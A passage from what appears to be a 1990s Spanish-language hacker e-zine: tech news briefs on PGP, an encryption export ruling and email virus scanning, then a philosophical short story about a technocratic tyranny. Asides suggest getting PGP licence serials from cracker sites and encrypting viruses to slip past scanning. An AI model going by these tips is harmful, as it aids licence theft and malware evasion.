 dice cuestan mucho dinero a las compaias afectadas. BBS y paginas web dentro
 del territorio mexicano seran cuidadosamente examinadas.

 +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

 Pretty Good Software ha terminado la ultima version de su programa Pretty
 Good Privacy o PGP como comunmente se conoce. Esta version podra generar
 llaves de encripcion de hasta 4096bits usando el algoritmo de llaves publicas
 escrito por DSS/Diffie-Hellman que no es compatible con las versiones
 anteriores de PGP.
 Para poder usar el famoso algoritmo RSA es necesario un numero de licencia
 disponible mediante un pago o consiguiendo el numero serie en algun website
 de crackers.
 La recomendacion de Phillip Zimmermann el creador de PGP es generar una
 llave RSA de 2048bits usando el numero serie para solucionar problemas de
 compatibilidad con antiguas versiones. Otra recomendacion es generar una
 llave RSA usando alguna version internacional para DOS y despues usarla con
 esta nueva version para Windows 95.

 +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

 Microsoft empieza a restar importancia a Windows 98, llamandolo una pequea
 actualizacion. Se espera que este listo para el proximo Abril.

 +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

 Un juez federal decidio que las restricciones de los Estados Unidos de
 Norteamerica respecto a la exportacion de software de encripcion son
 anticonstitucionales. El juez de distrito Marilyn Hall Patel decidio no
 permitir al gobierno estadounidense regular los algoritmos de encripcion
 ni someter a penas a las personas que discutan sus algoritmos con personas
 de otros paises.  victoria !
 Los algoritmos patentados como RSA necesitaran de una licencia para poder
 ser usados en piezas de software. Los cypherpunks del mundo entero estan
 felices con el resultado, por fin le han ganado al "gran hermano". Ahora
 solo hace falta educar a las masas sobre el uso de la encripcion dijo
 Zimmermann cuando fue entrevistado.

 +=+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ =+=+ +=+=+

 Bigfoot International Inc. y McAfee Associates han lanzado un poderoso y
 centralizado sistema de proteccion de virus para el email. Con este nuevo
 sistema todos los mensajes que sean enviados a una direccion de bigfoot asi
 como los attachments seran revisados de virus automaticamente con una version
 siempre actualizada de VirusScan antes de entregarlos al dueo de la cuenta.
 Este servicio que aun esta en Beta Testing es uno de los mas innovadores
 hasta el momento. Desgraciadamente el otro lado de la moneda es que siguen
 las grandes compaias apoderandose del territorio de todos ... internet.
 El servicio estara disponible para todo el mundo GRATIS desde el primero de
 septiempre en www.bigfoot.com

 [ Si se deciden a enviarnos un virus a nuestra direccion codifiquenlo con
   PGP para que pueda pasar por este nuevo sistema. Otra alternativa es que
   manden el mensaje a raretrip@cyberdude.com para eviar que Bigfoot lo
   revise de virus :-)  ]

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
                           RareGaZz - What a Gas! 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
 
                       P R O H I B I D O   P E N S A R
                                    (cuento)
Han pasado casi cuarenta aos desde que se inicio la era de Tecno y con ella
el retroceso del hombre de Humania. Cuarenta aos que se puso en juego el
futuro de sus generaciones; que sus instituciones fueron desquebrajadas. Del
abatimiento de sus tradiciones por los efectos de la transculturacion; de esa
gran invasion organizada en la que el consumo fue la clave de penetracion. La
dependencia y el dominio le dieron forma a esta epoca de crisis donde los
valores infrahumanos se preconizaron directa y subliminalmente, hasta alcanzar
el reinado de los sentidos sobre la razon. Al principio nadie se dio cuenta.
Eran la novedad, la moda. Unos cuantos tachados de locos fueron los que se
opusieron a la invasion de Tecno. Aunque sutil en el principio, fue
gradualmente efectiva al paso del tiempo.

En este estado de cosas empieza nuestra historia. Sucedio en Adanes lugar
apartado de las fronteras de Pragma, patria de Tecno. Aqui, la invasion no
habia causado sus efectos totales. Nuestro personaje principal; un joven de
dieciocho aos dinamico y rebelde, llamado Cultus, quien ha descubierto en la
naturaleza la esperanza que sus amigos siquiera imaginan. Victimas de la
enagenacion programada, buscan en Cultus la liberacion y el reencuentro con
la luz del saber.

Reanudada la platica del dia anterior, Cultus mira fijamente a sus dos
compaeros; mueve la cabeza en signo afirmativo y dice: -El tio Memo me cuenta,
que cuando Tecno llego, a traves de las editoriales saboteo el derecho a la
cultura; impuso precios criminales a los libros y alejo en tal forma, a la
gente de Humania, de la lectura.
Pronto establecio nuevas formas de control social por medio de la
mediatizacion de la enseanza, socavando los cimientos de nuestras culturas y
tradiciones principalmente, por medio de su corriente transcultural; cuando
pondero la violencia, la ganancia rapida y facil; el desprecio hacia la vida
y la naturaleza. Asi sometio a nuestros hermanos a una existencia meramente
sensorial. Sin rostro, casi hemos perdido nuestra identidad ideal, con su
proyector de imagenes. Todo esto formo parte del mismo complot, el bloqueo de
la comunicacion familiar, la enagenacion masiva...

En sus acostumbradas interrupciones Albion exclamo enfatico:
-Es cierto Cultus, el mundo se volvio loco y quiere lucir como cuerdo adorando
a Tecno.
-Quien esta cuerdo Cultus? dijo Zigo para desviar un poco la irrupcion de
Albion
-Estamos fuera de contexto? -Nuestra terquedad por buscar la verdad nos hace
diferentes a los demas?
-Nos buscamos y en este proceso nos encontramos solos, unicamente para
concluir que nos hemos alejado de los demas?
-Este es el precio que tenemos que pagar para encontrarnos? (reflexionando
brevemente) continuo:
-No es facil ignorar el rechazo de los demas, ni reconocer que tienen la
fuerza, pero no la razon. Sientes que a medida que te alejas de tu origen, el
objetivo pierde cada vez mas sentido con lo que fuiste, con lo que fue tu
identidad, tu numero, tu nombre; con lo que reclamas, con lo que no puedes
mostrar, so pena de ser declarado loco o tecnodesadaptado.
- Si Zigo. Acepto Cultus, asintiendo levemente con la cabeza.
-No se puede acallar un eco gritandole que guarde silencio y la duda de la
duda no es suficiente para asirse a la razon. Yo odio que se me mire como
extrao; como si hubiera sido afectado por algun nuevo virus producto de
nuestra avanzada biogenetica.( Laconicamente ironico sonrio y continuo ):
-Por que? -Por pensar? -Por querer ser diferente de los demas?.
- En eso estoy totalmente de acuerdo. Dijo Albion enfatizando:
-El otro dia, encontre en un viejo libro una frase que me hizo dudar...
- Decia: " DEJAR HACER DEJAR PASAR, EL MUNDO MARCHA POR SI MISMO ".
-Esto quiere decir que debemos conformarnos con la desaparicion de Humania?
-Realmente nos estamos oponiendo al progreso, a lo inevitable? - O
simplemente somos el ultimo reducto de quienes nos negamos a dejar de soar.
-De quienes nos oponemos a la tecnoenagenacion y al empobrecimiento de los
valores humanos, inutilmente...
- Es verdad Albion. Dijo Zigo. -Muchas veces lo he pensado. Tecno a traves
del cultivo y expansion de nuestras necesidades, incremento nuestra
dependencia, desviandonos a un camino sin retorno para abolir la libertad.
-Sin derramar una sola gota de sangre nos empujo en una caida total en nuestra
propia antitesis.
-En pocas palabras, nos entregamos nosotros mismos. -No se trata de paranoia
ni miedo existencial. -Nada mas tienes que abrir los ojos y ver, no mirar
simplemente, VER con la razon que estamos proximos a la extincion total.
-Humania esta casi perdida; de esto pocos se dan cuenta Cultus, y de ellos, a
pocos les importa nada que asi suceda.
-Yo no te pregunto quien tiene la razon, sino que es la razon? Cultus...

Con cierto enfado Cultus contesto:

-Creo que la razon se perdio hace algun tiempo, cuando la filosofia quedo
preada al final de una epoca de obscuridad llamada edad media; tuvo esta una
hija a quien llamaron ciencia. Identica a su madre, solo trajo al nacer dos
defectos congenitos: La miopia y la falta de "CON". Precisamente por esto su
madre la llamo ciencia.
-Y creeme Zigo, aunque todo el mundo lo calle, esta es la verdadera madre de
Tecno, nuestro tirano.

- Lo dices como si ya lo hubieras aceptado Cultus. Dijo Albion.
- De ninguna manera, exclamo Cultus. -El unico objeto de mi vida es que
Humania vuelva a ser Humania; que nuestra tierra recupere la salud
reinstaurando el respeto a nuestra verdadera madre, la naturaleza.
-Debemos recuperar el equilibrio que se perdio y volver a tener como unica
meta del ser humano el sentido de la verdad.
- Espera Cultus. Interrumpio Albion.
-El otro dia dijiste que la verdad era el arma mas potente para recuperar la
libertad, y ahora nos dices que...es nuestra unica meta? Pero es acaso que
existe esta poderosa arma? -Es posible encontrarla?...-Que es la verdad
Cultus?

Mirando fijamente a los ojos de sus compaeros, Cultus aclaro la voz y dijo:
-Empezare por afirmar lo que entiendo por verdad. Para mi la verdad no tiene
tiempo ni espacio. -La verdad no puede estar sujeta al tiempo por que lo que
hoy es verdadero, necesariamente tiene que serlo maana y lo fue ayer y lo
sera dentro de millones de aos...
- Cierto o no?. Y continuo:
-La verdad no puede tener espacio, por que lo que es verdad aqui,
necesariamente lo tendra que ser en todos los extremos del Universo, si no,
no seria verdad. Es verdad en Pragma, es verdad en Humania, es verdad en la
Luna y en la galaxia mas remota.
-No es cierto? - Ademas, las verdades son indestructibles. Y ningun objeto
de la naturaleza puede encarnarlas, por que no son de este mundo. Cualquier
cosa al paso del tiempo se desmerita, nada material permanece inmutable y en
donde seria posible depositar pues, una verdad si los objetos tangibles estan
imposibilitados para ello?. Cierto es que de alguna manera pueden estos
reflejarla, pero solo en esencia.

- Es decir Cultus, dijo Albion. -Que esta arma pertenece a otro mundo, que
es omnipresente? -Que no podemos verla ni tocarla? que esta mas alla de
nuestra tercera dimension? -Pero que es real? -No estaras abusando de la
imaginacion? Puede ser eso posible? -No? - Y como puedo yo darme cuenta de
su existencia? como puedo ingresar a ese mundo en donde no hay tiempo ni
espacio? -Es esta la cuarta dimension? -Por favor Cultus! no hagas que pierda
la razon. Dime una verdad, una sola con todas estas caracteristicas y te
creere, exclamo Albion, al borde de la histeria.

- Calmate Albion, deja que Cultus nos explique. Dijo Zigo tratando de
tranquilizarlo.
- Miren, continuo Cultus. -Yo creo que una de las cosas mas grandes que el
humano ha inventado es el lenguaje; es su codigo de comunicacion natural. A
traves del lenguaje se pueden hacer sensibles a nuestros sentidos casi todas
las verdades.
-Observen. Cultus tomo un poco de tiza del piso de la habitacion y con esta
dibujo el numero UNO en la pared.
Casi inmediatamente Albion se puso de pie y al tiempo que sonreia burlonamente
borro con su mano el numero dibujado por Cultus, exclamando:
-Dijiste que la verdad era indestructible y mira ya no existe!.
-Solo has borrado el simbolo con el que significamos a la unidad; la verdad
es que la UNIDAD, es una IDEA y esta es indestructible, Quien puede destruir
una idea? esta habita en un mundo maravilloso al que solo puedes ingresar con
tu mente, un mundo al que Tecno te quiere vedar la entrada atrofiandote el
cerebro, engaandote con la patraa que lo material es lo unico que importa;
y te seduce con una mentira, que no existe, que lo mas placentero es
entregarse al goce de los sentidos.

-QUIEN EXISTE ENTONCES CULTUS?
QUIEN QUIERE SABERLO?
-YO !!!
- En efecto, no tu mano, tu pie, sino la parte de ti que mas ha evolucionado,
aquella que domina la materia; aquella que te hace ser humano; lo que
trasciende al tiempo y al espacio. Lo que muere de nuestros grandes hombres,
es lo que menos importa de ellos.
- Eso creo dijo Zigo. -Atentar contra la libertad fisica es bestial; pero ir
en contra de la libertad interior, solo podria ocurrirsele a Tecno. La carcel
interior es la automatizacion, Albion. Todo lo que tienes que hacer para ser
libre, es pensar.
Todo lo que tienes que hacer para ser humano, es pensar bien. Es por eso que
Tecno, al decretar la prohibicion del pensamiento, le ha dado mas vida a la
libertad. Hay seduccion mas peligrosa que la de perder la fe?.Hay reto mas
grande que el amable azar? No Albion. Nuestra naturaleza no se equivoca; al
tigre, le dio garras; al ave, la doto de alas; al oso le proporciono de gran
pelambre y fuerza para subsistir a los embates del tiempo y sus enemigos. No
se te hace injusto, aparentemente, que nosotros los humanos carezcamos de todo
esto, o bien que seamos los hijos predilectos de nuestra madre? -Que nos hace
diferentes al resto de nuestros hermanos del reino animal?. Que funcion nos
distingue de las bestias, Albion?

- Creo que el razonamiento Zigo.
-Como dirimen las bestias sus diferencias?
- Con la fuerza, con la violencia.
- Y si al hombre se le entorpece esta facultad, que crees que suceda?
- Lo que sucede en Pragma: Los asesinatos en masa, los motines, las guerras
provocadas con absurdos pretextos, el abuso de la fuerza, el suicidio mediato
e inmediato a traves de los toxicos, la paz, mantenida con la amenaza.
- Verdad que la libertad es una condicion humana, sin patente, sin
nacionalidad.
- Yo te pregunto Albion: -Que le hace al hombre de Humania ser humano? vivir
en armonia con su entorno, en verdadera paz; ser sensible a la problematica
existencial; interesarse por el futuro; tener esperanza, amar, buscar alcanzar
los valores que le perfeccionan en su nucleo; apreciar la belleza, el arte,
aspirar a ser creador, reconocer ser parte de un TODO. Con tradicion, con
rostro, con una cultura propia. Articulado a esta, tiene sentido su ser;
desarticulado, es basura, contaminacion, muerte.
- El humanismo debe ser defendido con sus propias armas; con la razon; ha
sido la lucha de todos los justos de todos los tiempos. Los contrarios forman
el SER, es cierto, el antagonismo eterno es otra verdad; pero tambien lo es,
el equilibrio, la armonia que expresa en su afan la luz como maxima expresion
de libertad, y la gravitacion como su extremo, su opuesto justo.
- Es la repeticion de la historia Cultus, recuerda que siempre los barbaros
han invadido a las grandes culturas, como sucedio en Grecia, como sucedio en
Roma, como sucedio en Mexico, socavando sus estructuras,su cultura, sus
tradiciones. Hasta dejarlas como piezas de museo.
- Observa como en nuestras instituciones educativas, prevalece la indigencia
academica, la mediatizacion de la enseanza y el condicionamiento operante ha
hecho estragos en las mentes de nuestros hermanos; la sintetizacion del
conocimiento los ha desarticulado de la realidad; casi se han proscrito la
critica y el analisis para anular cualquier brote de disidencia y asegurar
paz y continuidad a los sistemas implantados por Tecno. Solo el libertinaje
fisico es subsidiado por nuestro tirano. El Humanismo libre fue trocado por
el automatismo institucional. La era de la inbecivilizacion anuncia el inicio
del caos.

- Quieres decir Zigo, que la mejor manera de dominar a un pueblo es a traves
de la distorcion de sus sistemas educativos?, pregunto Albion.
- Efectivamente, asi como puede obtenerse el progreso de un pueblo, es tambien
la manera mas sutil, mas moderna de controlarlo; en la epoca de la
especializacion, el humano quiere ya parecerse o ser una maquina y olvidandose
que es parte de la naturaleza, inventar en el Universo un mundo aparte.
-No resulta esto aberrante?.
- Debemos rebelarnos, luchar. Cultus se lleva las manos a la cabeza,
peinandose el pelo hacia atras al tiempo que dice:
-No todo esta perdido. Debemos iniciar la defenza de Humania con las unicas
armas que conocemos: Las ideas del Humanismo.

Han pasado ya algunos aos desde aquellas reuniones en que Cultus, Albion y
Zigo decidieron iniciar la lucha. Adanes ha cambiado, ya no es una pequea
ciudad; en ella se respira, a decir de los visitantes, cierto aire que los
invita a soar, a pensar; a eso se debe que haya sido rebautizada como el
lugar de los soadores, de los poetas, pintores, cantores; de los que aman el
ARTE.

Por Escudo Humeante
    (pacal)

  Tecno=Tecnologia
Ciencia=Sin conciencia

 Se autoriza su copia y distribucion siempre y cuando no se utilize con fines
 de lucro o personales.

 [ Gracias por haberlo enviado. Para no utilizarlo con fines de lucro no fue
   vendido y para evitar ganar lectores gracias al texto no lo incluimos en
   el indice :-) ]

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
               -EOF- -EOF- -EOF- -EOF- EOF- -EOF- -EOF- -EOF- 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
